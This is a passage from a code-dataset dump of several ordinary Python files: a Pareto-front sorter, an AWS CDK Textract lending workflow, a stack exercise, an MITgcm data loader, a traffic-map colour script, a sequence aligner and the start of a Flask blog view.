self.dominated_by_counter[b] += 1\n elif rel == Domination.LESS:\n self.is_dominating[b].append(a)\n self.dominated_by_counter[a] += 1\n\n def get_pareto_fronts(self):\n while self.values:\n current_front = [ v for v in self.values if self.dominated_by_counter[v] == 0]\n yield current_front\n\n for v in current_front:\n for dominated in self.is_dominating[v]:\n self.dominated_by_counter[dominated] -= 1\n\n self.values.remove(v)\n try:\n del self.is_dominating[v]\n except KeyError:\n pass\n try:\n del self.dominated_by_counter[v]\n except KeyError:\n pass\n\n\nclass Cmp(metaclass=abc.ABCMeta):\n @abc.abstractclassmethod\n def compare(self, a, b) -> Domination:\n raise NotImplementedError\n \n @abc.abstractclassmethod\n def is_pareto(self) -> bool:\n raise NotImplementedError\n \n @abc.abstractclassmethod\n def is_group(self) -> bool:\n raise NotImplementedError\n\n @abc.abstractclassmethod\n def group(self, a) -> int:\n raise NotImplementedError\n\nclass GroupNones(Cmp):\n def __init__(self, targets: MaxMinList):\n self._targets = targets\n @property\n def targets(self):\n return self._targets\n def compare(self, a, b) -> Domination:\n raise NotImplementedError\n def is_pareto(self) -> bool:\n return False\n def is_group(self) -> bool:\n return True\n\n def group(self, a) -> int:\n \"\"\"\n GroupNones(MaxMinList(MaxMin.MIN, MaxMin.MIN, MaxMin.MIN)).group((0,None,None))\n -2\n \"\"\"\n noneSum = 0\n for d in range(self.targets.dim):\n if self.targets.list[d] is MaxMin.SKIP:\n continue\n if self.targets.list[d] is MaxMin.MAX and a[d] is None:\n noneSum += 1\n if self.targets.list[d] is MaxMin.MIN and a[d] is None:\n noneSum -= 1\n return noneSum\n \n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, c)\n \n def as_chain(self):\n return ComparisonChain(self)\n\n\nclass Comparison(Cmp):\n def __init__(self, cmp, targets: MaxMinList):\n self._cmp = cmp\n self._targets = targets\n \n def is_pareto(self) -> bool: return True\n def is_group(self) -> bool: return False\n def group(self, a) -> int: return 1\n\n @property\n def cmp(self):\n return self._cmp\n\n @property\n def targets(self):\n return self._targets\n\n def compare(self, a,b) -> Domination:\n return dominates(a, b, self.cmp, self.targets)\n\n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, c)\n \n def as_chain(self):\n return ComparisonChain(self)\n\nclass ComparisonChain:\n def __init__(self, *chain: List[Comparison]):\n self._chain = chain\n\n @property\n def chain(self) -> List[Comparison]:\n return self._chain\n\n def compare(self, a, b) -> Domination:\n for c in self.chain[:-1]:\n if not c.is_pareto():\n continue\n result = c.compare(a, b)\n if result == Domination.EQUAL:\n continue\n return result\n return self.chain[-1].compare(a, b)\n \n def and_then(self, c: Cmp) -> Cmp:\n return ComparisonChain(self, *self.chain, c)\n\n \n def split_by_pareto(self, values):\n \"\"\"ComparisonChain.split_by_pareto performs the pareto front split fronts.\n\nCurrently this works only for unique rows. You can add id as the last row (and not sort by it) to work around this restriction.\n\nHere the None means just inferior value:\n\n >>> values = [(0,None,None), (2,2,2), (0,1,1), (0,0,1), (None,0,1), (0,1,0), (None,1,1), (1,0,0), (0,0,0)]\n >>> chain = Comparison(by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)).as_chain()\n >>> chain.split_by_pareto(values)\n [[(2, 2, 2)], [(0, 1, 1), (1, 0, 0)], [(0, 0, 1), (0, 1, 0), (None, 1, 1)], [(None, 0, 1), (0, 0, 0)], [(0, None, None)]]\n\nHere one extra None means that the whole row is inferior:\n\n >>> values = [(0,None,None), (2,2,2), (0,1,1), (0,0,1), (None,0,1), (0,1,0), (None,1,1), (1,0,0), (0,0,0), (None, 0, None)]\n >>> chain = GroupNones(MaxMinList(MaxMin.MIN, MaxMin.MIN, MaxMin.MIN)).and_then(\n ... Comparison(by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)))\n >>> chain.split_by_pareto(values)\n [[(2, 2, 2)], [(0, 1, 1), (1, 0, 0)], [(0, 0, 1), (0, 1, 0)], [(0, 0, 0)], [(None, 1, 1)], [(None, 0, 1)], [(0, None, None), (None, 0, None)]]\n\n\"\"\"\n splitted = [values]\n for comparison in self.chain:\n if comparison.is_pareto():\n new_splitted = []\n while len(splitted) > 0:\n group = splitted.pop(0)\n new_groups = list(DominanceMatrix(group, comparison.compare).get_pareto_fronts())\n new_splitted.extend(new_groups)\n splitted = new_splitted\n elif comparison.is_group():\n new_splitted = []\n while len(splitted) > 0:\n group = splitted.pop(0)\n group_dict = defaultdict(list)\n for a in group:\n group_dict[comparison.group(a)].append(a)\n keys = list(group_dict.keys())\n keys.sort()\n keys.reverse()\n new_groups = [group_dict[k] for k in keys]\n \n new_splitted.extend(new_groups)\n splitted = new_splitted\n return splitted\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()","repo_name":"kummahiih/pypareto","sub_path":"pypareto/pypareto.py","file_name":"pypareto.py","file_ext":"py","file_size_in_byte":12611,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"73115560905","text":"from constructs import Construct\nimport os\nimport aws_cdk.aws_s3 as s3\nimport aws_cdk.aws_s3_notifications as s3n\nimport aws_cdk.aws_stepfunctions as sfn\nimport aws_cdk.aws_stepfunctions_tasks as tasks\nimport aws_cdk.aws_dynamodb as dynamodb\nimport aws_cdk.aws_lambda as lambda_\nimport aws_cdk.aws_iam as iam\nimport aws_cdk.custom_resources as custom_resources\nfrom aws_cdk import (CfnOutput, RemovalPolicy, Stack, Duration, CustomResource,\n Aws)\nimport amazon_textract_idp_cdk_constructs as tcdk\n\n\nclass LendingWorkflow(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(\n scope,\n construct_id,\n description=\n \"IDP CDK constructs sample for Textract AnalyzeLending and subsequent CSV generation with extraction path for AnalzyeLending unknown doc-types (SO9217)\",\n **kwargs)\n\n script_location = os.path.dirname(__file__)\n s3_upload_prefix = \"uploads\"\n s3_output_prefix = \"textract-output\"\n s3_temp_output_prefix = \"textract-temp-output\"\n s3_txt_output_prefix = \"textract-txt-output\"\n s3_csv_output_prefix = \"textract-csv-output\"\n\n # BEWARE! This is a demo/POC setup, remove the auto_delete_objects=True to maintain objects/document after destorying the stack\n document_bucket = s3.Bucket(self,\n \"TextractSimpleSyncWorkflow\",\n auto_delete_objects=True,\n removal_policy=RemovalPolicy.DESTROY)\n s3_output_bucket = document_bucket.bucket_name\n workflow_name = \"LendingWorkflow\"\n\n #### DOCUMENT TYPE CONFIGURATION SETUP ####\n # Configuration table for Document-Type to Textract features mapping\n configuration_table = dynamodb.Table(\n self,\n 'TextractConfigurationTable',\n partition_key=dynamodb.Attribute(\n name='DOCUMENT_TYPE', type=dynamodb.AttributeType.STRING),\n billing_mode=dynamodb.BillingMode.PAY_PER_REQUEST,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n configuration_init_function: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"ConfigurationInitFunction\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/cfn_custom_configurator_prefill')),\n memory_size=128,\n timeout=Duration.seconds(600),\n architecture=lambda_.Architecture.X86_64,\n environment={\n \"LOG_LEVEL\": 'DEBUG',\n \"CONFIGURATION_TABLE\": configuration_table.table_name\n })\n\n configuration_init_function.add_to_role_policy(\n iam.PolicyStatement(\n actions=['dynamodb:PutItem', 'dynamodb:GetItem'],\n resources=[configuration_table.table_arn]))\n\n provider = custom_resources.Provider(\n self,\n 'Provider',\n on_event_handler=configuration_init_function,\n )\n\n CustomResource(self, 'Resource', service_token=provider.service_token)\n\n ### END OF DOCUMENT TYPE CONFIGURATION SETUP ####\n\n decider_task = tcdk.TextractPOCDecider(\n self,\n f\"{workflow_name}-Decider\",\n )\n\n textract_lending_task = tcdk.TextractGenericAsyncSfnTask(\n self,\n \"TextractAnalzyeLending\",\n s3_output_bucket=s3_output_bucket,\n s3_temp_output_prefix=s3_temp_output_prefix,\n textract_api=\"LENDING\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.textract_result\")\n\n textract_lending_to_json = tcdk.TextractAsyncToJSON(\n self,\n \"GenerateLendingJSON\",\n s3_output_prefix=s3_output_prefix,\n s3_output_bucket=s3_output_bucket,\n textract_api='LENDING')\n\n generate_lending_csv = tcdk.TextractGenerateCSV(\n self,\n \"GenerateLendingCSV\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_csv_output_prefix,\n output_type='CSV',\n textract_api='LENDING',\n meta_data_to_append=[\"DOCUMENT_ID\"],\n lambda_log_level=\"DEBUG\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.txt_output_location\")\n\n textract_sync_task = tcdk.TextractGenericSyncSfnTask(\n self,\n \"TextractSyncOCR\",\n s3_output_bucket=s3_output_bucket,\n s3_output_prefix=s3_output_prefix,\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.textract_result\")\n\n generate_text = tcdk.TextractGenerateCSV(\n self,\n \"GenerateText\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_txt_output_prefix,\n output_type='LINES',\n lambda_log_level=\"DEBUG\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.txt_output_location\")\n\n classification_custom_docker: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"ClassificationCustomDocker\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/lending_sample_classification/')),\n memory_size=10240,\n architecture=lambda_.Architecture.X86_64,\n timeout=Duration.seconds(900),\n environment={\"LOG_LEVEL\": \"DEBUG\"})\n\n spacy_classification_task = tcdk.SpacySfnTask(\n self,\n \"Classification\",\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n docker_image_function=classification_custom_docker,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.classification\")\n\n configurator_task = tcdk.TextractClassificationConfigurator(\n self,\n f\"{workflow_name}-Configurator\",\n configuration_table=configuration_table)\n\n textract_queries_async_task = tcdk.TextractGenericAsyncSfnTask(\n self,\n \"TextractAsyncQueries\",\n s3_output_bucket=s3_output_bucket,\n s3_temp_output_prefix=s3_output_prefix,\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n lambda_log_level=\"DEBUG\",\n timeout=Duration.hours(24),\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.textract_result\")\n\n textract_async_to_json = tcdk.TextractAsyncToJSON(\n self,\n \"TextractAsyncToJSON2\",\n s3_output_prefix=s3_output_prefix,\n s3_output_bucket=s3_output_bucket)\n\n generate_csv = tcdk.TextractGenerateCSV(\n self,\n \"GenerateCsvTask\",\n csv_s3_output_bucket=document_bucket.bucket_name,\n csv_s3_output_prefix=s3_csv_output_prefix,\n lambda_log_level=\"DEBUG\",\n output_type='CSV',\n meta_data_to_append=[\"DOCUMENT_ID\"],\n integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n input=sfn.TaskInput.from_object({\n \"Token\":\n sfn.JsonPath.task_token,\n \"ExecutionId\":\n sfn.JsonPath.string_at('$$.Execution.Id'),\n \"Payload\":\n sfn.JsonPath.entire_payload,\n }),\n result_path=\"$.csv_output_location\",\n )\n\n unclassified_lambda_sfn: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n 'LendingUnclassifiedNumber',\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/lending-unclassified')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"LOG_LEVEL\": \"DEBUG\"})\n\n unclassified_lambda_sfn.add_to_role_policy(\n iam.PolicyStatement(actions=['s3:List*'],\n resources=[\n f\"arn:aws:s3:::{s3_output_bucket}\",\n f\"arn:aws:s3:::{s3_output_bucket}/*\"\n ]))\n\n unclassified_lambda_task = tasks.LambdaInvoke(\n self,\n 'UnclassifiedNumberTask',\n lambda_function=unclassified_lambda_sfn,\n output_path='$.Payload')\n\n # The set_meta_data_function sets the document_id, so the process can later add that to the CSV output\n set_meta_data_function: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n 'SetMetaDataFunction',\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/set-manifest-meta-data')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"LOG_LEVEL\": \"ERROR\"})\n\n set_meta_data_task = tasks.LambdaInvoke(\n self,\n 'SetMetaData',\n lambda_function=set_meta_data_function,\n output_path='$.Payload')\n\n lambda_generate_classification_mapping: lambda_.IFunction = lambda_.DockerImageFunction( #type: ignore\n self,\n \"LambdaGenerateClassificationMapping\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location,\n '../lambda/map_classifications_lambda/')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={})\n\n task_generate_classification_mapping = tasks.LambdaInvoke(\n self,\n \"TaskGenerateClassificationMapping\",\n lambda_function=lambda_generate_classification_mapping,\n output_path='$.Payload')\n\n analyze_lending_post_processing_chain = textract_lending_to_json.next(\n generate_lending_csv)\n\n doc_type_choice = sfn.Choice(self, 'RouteDocType') \\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'NONE'), task_generate_classification_mapping) \\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'CONTACT_FORM'), configurator_task)\\\n .when(sfn.Condition.string_equals('$.classification.documentType', 'HOMEOWNERS_INSURANCE_APPLICATION'), configurator_task)\\\n .otherwise(task_generate_classification_mapping)\n\n configurator_task.next(textract_queries_async_task) \\\n .next(textract_async_to_json) \\\n .next(generate_csv) \\\n .next(task_generate_classification_mapping)\n\n textract_sync_task.next(generate_text) \\\n .next(spacy_classification_task) \\\n .next(doc_type_choice)\n\n map = sfn.Map(\n self,\n \"Unclassified Documents Map State\",\n items_path=sfn.JsonPath.string_at('$.unclassifiedDocsArray'),\n parameters={\n \"manifest\": {\n \"s3Path\":\n sfn.JsonPath.string_at(\"States.Format('s3://{}/{}/{}', \\\n $.unclassifiedDocsBucket, \\\n $.unclassifiedDocsPrefix, \\\n $$.Map.Item.Value)\"),\n \"metaData\":\n sfn.JsonPath.string_at('$.manifest.metaData')\n },\n \"mime\": sfn.JsonPath.string_at('$.mime'),\n \"numberOfPages\": 1\n })\n map.iterator(textract_sync_task)\n\n unclassified_chain = sfn.Chain.start(unclassified_lambda_task) \\\n .next(map)\n\n # unclassified_state_machine = sfn.StateMachine(\n # self, \"UnclassifiedStateMachine\", definition=unclassified_chain)\n\n # unclassified_task = tasks.StepFunctionsStartExecution(\n # self,\n # \"UnclassifiedProcessing\",\n # state_machine=unclassified_state_machine,\n # integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,\n # input=sfn.TaskInput.from_object({\n # \"Token\":\n # sfn.JsonPath.task_token,\n # \"ExecutionId\":\n # sfn.JsonPath.string_at('$$.Execution.Id'),\n # \"Payload\":\n # sfn.JsonPath.entire_payload,\n # }))\n\n parallel_tasks = sfn.Parallel(self, 'parallel') \\\n .branch(analyze_lending_post_processing_chain) \\\n .branch(unclassified_chain)\n\n workflow_chain = sfn.Chain \\\n .start(set_meta_data_task) \\\n .next(decider_task) \\\n .next(textract_lending_task) \\\n .next(parallel_tasks)\n\n # GENERIC\n state_machine = sfn.StateMachine(self,\n workflow_name,\n definition=workflow_chain)\n\n lambda_step_start_step_function = lambda_.DockerImageFunction(\n self,\n \"LambdaStartStepFunctionGeneric\",\n code=lambda_.DockerImageCode.from_image_asset(\n os.path.join(script_location, '../lambda/startstepfunction')),\n memory_size=128,\n architecture=lambda_.Architecture.X86_64,\n environment={\"STATE_MACHINE_ARN\": state_machine.state_machine_arn})\n\n lambda_step_start_step_function.add_to_role_policy(\n iam.PolicyStatement(actions=['states:StartExecution'],\n resources=[state_machine.state_machine_arn]))\n\n document_bucket.add_event_notification(\n s3.EventType.OBJECT_CREATED,\n s3n.LambdaDestination(\n lambda_step_start_step_function), #type: ignore\n s3.NotificationKeyFilter(prefix=s3_upload_prefix))\n\n # OUTPUT\n CfnOutput(\n self,\n \"DocumentUploadLocation\",\n value=f\"s3://{document_bucket.bucket_name}/{s3_upload_prefix}/\",\n export_name=f\"{Aws.STACK_NAME}-DocumentUploadLocation\")\n CfnOutput(\n self,\n \"StartStepFunctionLambdaLogGroup\",\n value=lambda_step_start_step_function.log_group.log_group_name)\n current_region = Stack.of(self).region\n CfnOutput(\n self,\n 'StepFunctionFlowLink',\n value=\n f\"https://{current_region}.console.aws.amazon.com/states/home?region={current_region}#/statemachines/view/{state_machine.state_machine_arn}\",\n export_name=f\"{Aws.STACK_NAME}-StepFunctionFlowLink\")\n","repo_name":"aws-solutions-library-samples/guidance-for-low-code-intelligent-document-processing-on-aws","sub_path":"textract_cdk_stack_samples/lending_workflow.py","file_name":"lending_workflow.py","file_ext":"py","file_size_in_byte":16820,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"81"} +{"seq_id":"17827576366","text":"#! python3\n# Stack overview program. with built-in method\nimport sys\n\nlst = []\n\ndef push(number):\n\tif len(lst) <= 10:\n\t\tlst.append(number)\n\telse:\t\n\t\tprint(\"Stack overload\")\n\t\t\n\ndef pops():\n\tremove_element = 0\n\tif len(lst) > 0:\n\t\tremove_element = lst[len(lst) - 1]\n\t\tlst.pop()\n\t\tprint(\"The list element value is \", remove_element, \" has been removed.\")\n\telse:\n\t\tprint(\"The list is empty.\")\n\t\ndef is_empty():\n\tif len(lst) == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef length():\n\treturn len(lst)\n\ndef top():\n\treturn lst[0]\n\ndef show():\n\tprint(lst)\n\ndef title():\n\tprint(\"Stack operation\")\n\ndef body():\n\tprint(\"0 => quit\")\n\tprint(\"1 => push\")\n\tprint(\"2 => pop\")\n\tprint(\"3 => len\")\n\tprint(\"4 => is_empty\")\n\tprint(\"5 => top\")\n\tprint(\"6 => show\")\n\nif __name__ == '__main__':\n\topt = 6\n\ttitle()\n\twhile opt != 0:\n\t\ttry:\n\t\t\tbody()\n\t\t\topt = int(input(\"Enter option: \"))\n\t\t\tprint(\"Ok, your request is processing.\")\n\t\t\tif opt == 0:\n\t\t\t\tprint(\"Bye bye, thanks for trying.\")\n\t\t\t\tsys.exit()\n\t\t\telif opt == 1:\n\t\t\t\tprint(\"Push value in stack\")\n\t\t\t\ttry:\n\t\t\t\t\tvalue = int(input(\"Enter value in stack \"))\n\t\t\t\t\tpush(value)\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"There was just an issue, when push value in stack.\")\n\t\t\telif opt == 2:\n\t\t\t\tprint(\"Pop value in stack\")\n\t\t\t\tpops()\n\t\t\telif opt == 3:\n\t\t\t\tprint(\"The length of stack is \", length())\n\t\t\telif opt == 4:\n\t\t\t\tif is_empty():\n\t\t\t\t\tprint(\"Yes, the stack is emtpy.\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No, the stack is not empty.\")\n\t\t\telif opt == 5:\n\t\t\t\tprint(\"The top stack reference is\", top())\n\t\t\telif opt == 6:\n\t\t\t\tshow()\n\t\t\telse:\n\t\t\t\tprint(\"Incorrect input.\")\n\t\texcept:\n\t\t\tpass\n\n\t","repo_name":"kshitijyadav1/Python_Programming_Stuff","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6937358935","text":"import MITgcmDiff.loadFunctions\nimport MITgcmDiff.Operators as op \nimport MITgcmDiff.utils as ut\nfrom MITgcmutils import mds\nimport MITgcmDiff.loadFunctions as lf\nimport MITgcmDiff.xarrayCoversion as xac\nimport numpy as np\nimport pandas as pd\n\n\nclass MITgcmSimMetadata:\n\n def __init__(self, start_datetime, deltaT, data_dir, grid_dir):\n\n self.start_datetime = pd.Timestamp(start_datetime)\n self.deltaT = deltaT\n self.data_dir = data_dir\n self.grid_dir = grid_dir\n \n\ndef getItersFromDate(dt, msm : MITgcmSimMetadata):\n \n if type(dt) == str:\n dt = pd.Timestamp(dt) \n \n delta_seconds = (dt - msm.start_datetime).total_seconds()\n iters = delta_seconds / msm.deltaT\n\n if iters % 1 != 0:\n raise Exception(\"The specified time is not a multiple of deltaT. Please check if deltaT is correct.\")\n \n iters = int(iters)\n \n return iters\n\ndef getDateFromIters(iters, msm : MITgcmSimMetadata):\n \n return msm.start_datetime + pd.Timedelta(seconds=msm.deltaT) * iters\n\n\n\n\ndef loadDataByDate(dt, msm : MITgcmSimMetadata, region=None, lev=(), merge=True, datasets=[]):\n \n data = dict()\n\n iters = getItersFromDate(dt, msm)\n \n for k in datasets:\n \n print(\"Loading file of \", k)\n\n\n kwargs = dict(\n region=region,\n returnmeta=True,\n )\n\n if k in [\"diag_state\", \"diag_Tbdgt\"]:\n kwargs[\"lev\"] = lev\n\n bundle = mds.rdmds(\"%s/%s\" % (msm.data_dir, k,), iters, **kwargs)\n _data = lf.postprocessRdmds(bundle)\n\n\n if merge:\n for varname, vardata in _data.items():\n data[varname] = vardata\n\n else:\n data[k] = _data\n\n\n return data\n\n\n\n\n","repo_name":"meteorologytoday/project-coastal-AR-high-res","sub_path":"src/diag/data_loading_helper.py","file_name":"data_loading_helper.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18112614241","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nalpha=0.15\nbelta=0.11\nday='morning'\npath = '/home/kirin/Python_Code/red-green-blindness/video_maker/final/'+day+'/'\n\nOut_path = '/home/kirin/Python_Code/red-green-blindness/video_maker/output_video/OutPut_aft.mp4'\nfilelist = os.listdir(path)\n\ninput_dir='/run/media/kirin/新加卷1/images/'\npath=input_dir\nfilelist = []\nwith open(input_dir+day+'.txt','r')as f:\n ls=f.readlines()\n for l in ls:\n l=l.strip('\\n')\n # if l[len('2019-03-21-15_04_11_'):-len('.png')] =='116.394362_39.93587599999999':\n filelist.append(input_dir+day+'/'+l)\n\nprint(filelist)\na=Image.open(filelist[0])\na.show()\nexit()\ncolor_dic = {'RED_l': np.array([0, 0, 220]), 'RED_h': np.array([0, 0, 222]),\n 'YELLO_l': np.array([0, 202, 253]), 'YELLO_h': np.array([0, 204, 255]),\n 'GREEN_l': np.array([0, 175, 49]), 'GREEN_h': np.array([0, 177, 51]),\n 'DEEPRED_l': np.array([13, 13, 138]), 'DEEPRED_h': np.array([13, 13, 140]), }\n\n\ndef get_line(frame):\n # get mask\n r = cv2.inRange(frame, color_dic['RED_l'], color_dic['RED_h'])\n y = cv2.inRange(frame, color_dic['YELLO_l'], color_dic['YELLO_h'])\n g = cv2.inRange(frame, color_dic['GREEN_l'], color_dic['GREEN_h'])\n dr = cv2.inRange(frame, color_dic['DEEPRED_l'], color_dic['DEEPRED_h'])\n mask = r + y + g + dr\n # mask = g\n res = cv2.bitwise_and(frame, frame, mask=mask)\n return mask, g, y, r, dr\n # return res\n\n\nfilelist.sort()\n\nhot_map = 0\ncount = 0\nfor index, item in enumerate(filelist):\n try:\n if item.endswith('.png'):\n name_str = item.split('.')[0]\n # item = path + item\n img = cv2.imread(item)\n\n aft_img, g, y, r, dr = get_line(img)\n hot_map += 0 * np.sign(g) + 0 * np.sign(y) + 2 * np.sign(r) + 2 * np.sign(dr)\n count += 1\n print(item)\n except Exception as e:\n print(e)\n print('erro!')\n pass\n\nhot_map += 1 * np.sign(g) + 1 * np.sign(y) + 1 * np.sign(r) + 1 * np.sign(dr)\n\ntotal_time = count * 2\n\nmap = hot_map / total_time\n\n\n# np.save(\"data.npy\", map)\n\nprint(count)\n\n# map = np.load(\"data.npy\")\n\nprint(np.max(map))\n\n\nred = map > alpha\nyellow = (map > belta) & (map <= alpha)\ngreen = (map <= belta) & (map > 0)\n\nred = red[:, :, np.newaxis]\nyellow = yellow[:, :, np.newaxis]\ngreen = green[:, :, np.newaxis]\n\nred = np.repeat(red, 3, axis=2)\nyellow = np.repeat(yellow, 3, axis=2)\ngreen = np.repeat(green, 3, axis=2)\n\nred = red * color_dic['RED_l']\nyellow = yellow * color_dic['YELLO_l']\ngreen = green * color_dic['GREEN_l']\n\nfinal = red + yellow + green\n\ncv2.imwrite(day+\"_final.png\", final)\n","repo_name":"kirin-intelligence/red-green-blindness","sub_path":"video_maker/RGB_color.py","file_name":"RGB_color.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73906183306","text":"a=\"ATGAGTCTCT\"\r\nb=\"CTGTCTCCTG\"\r\n#пример последовательностей\r\nDNAfull = [[5,-4, -4, -4], [-4, 5, -4, -4], [-4, -4, 5, -4], [-4, -4, -4, 5]]\r\ndDNA = {['C', 'T', 'A', 'G'][a]: a for a in range (4)}\r\nd=-10\r\nm=[[i*d for i in range(len(a)+1)],[0]*(len(a)+1)]\r\n\r\n\r\nl=['P','D','V']\r\nrow=[]\r\nfor i in range(1,len(b)+1):\r\n line=[]\r\n for j in range(1,len(a)+1):\r\n pos=[m[1][j-1]+d,m[0][j-1]+DNAfull[dDNA[a[j-1]]][dDNA[b[i-1]]],m[0][j]+d]\r\n ds=dict(zip(pos,l))\r\n m[1][j]=max(pos)\r\n line.append(ds[int(m[1][j])])\r\n m[0][0],m[1][0]=i*d,i*d\r\n m[0]=m[1].copy()\r\n row.append(line)\r\n\r\nimport numpy as np\r\nroute = np.asarray(row)\r\n\r\n\r\nresa = ''\r\nresb = ''\r\nprov = np.empty(shape=(0, 0))\r\n\r\nwhile a != '' and b != '':\r\n if route[-1, -1] == 'V':\r\n resa = '-' + resa\r\n resb = b[-1] + resb\r\n b = b[:-1]\r\n\r\n route = route[:-1]\r\n elif route[-1, -1] == 'P':\r\n resa = a[-1] + resa\r\n a = a[:-1]\r\n resb = '-' + resb\r\n route = route[:, :-1]\r\n else:\r\n resa = a[-1] + resa\r\n a = a[:-1]\r\n resb = b[-1] + resb\r\n b = b[:-1]\r\n route = route[:-1, :-1]\r\n\r\nprint(resa+'\\n'+resb)\r\n","repo_name":"GeorgyVladimirskiy/bioinf_dz_3","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38357368457","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: blog\n Description :\n Author : ybw\n date: 2020/8/13\n-------------------------------------------------\n Change Activity:\n 2020/8/13:\n-------------------------------------------------\n\"\"\"\nfrom flask import render_template, flash, redirect, url_for, request, current_app, Blueprint, abort, make_response\nfrom flask_login import current_user\n\n# from ..emails import send_new_comment_email, send_new_reply_email\nfrom ..emails import send_new_reply_email, send_new_comment_email\nfrom ..extensions import db\n# from ..forms import CommentForm, AdminCommentForm\nfrom ..forms import AdminCommentForm, CommentForm\nfrom ..models import Post, Category, Comment\n\n# from .utils import redirect_back\nfrom ..utils import redirect_back\n\nblog_bp = Blueprint('blog', __name__)\n\n\n# pagination = Post.query.order_by(Post.timestamp.desc()).paginate(1, per_page=10)\n\n@blog_bp.route('/')\ndef index():\n \"\"\"\n 显示主页内容\n :return:\n \"\"\"\n # 参数出现了类型错误,会返回1首页\n page = request.args.get('page', 1, type=int)\n per_page = current_app.config['BLUELOG_POST_PER_PAGE']\n # 为了实现分类, 不再是all , 而是 paginate 返回page页的记录,把记录分成几页\n # paginate(error_out=True),如果页面超过最大值,page或per_page为负数或非整数会返回404,如果是false,返回空记录.. max_per_page参数用来设置每页数量的最大值\n # pagination 对象是一个链表,每一个节点元素是pages . pagination.pages=5 pagination.total=50\n pagination = Post.query.order_by(Post.timestamp.desc()).paginate(page, per_page=per_page)\n posts = pagination.items\n return render_template('blog/index.html', pagination=pagination, posts=posts)\n\n\n@blog_bp.route('/about')\ndef about():\n \"\"\"\n 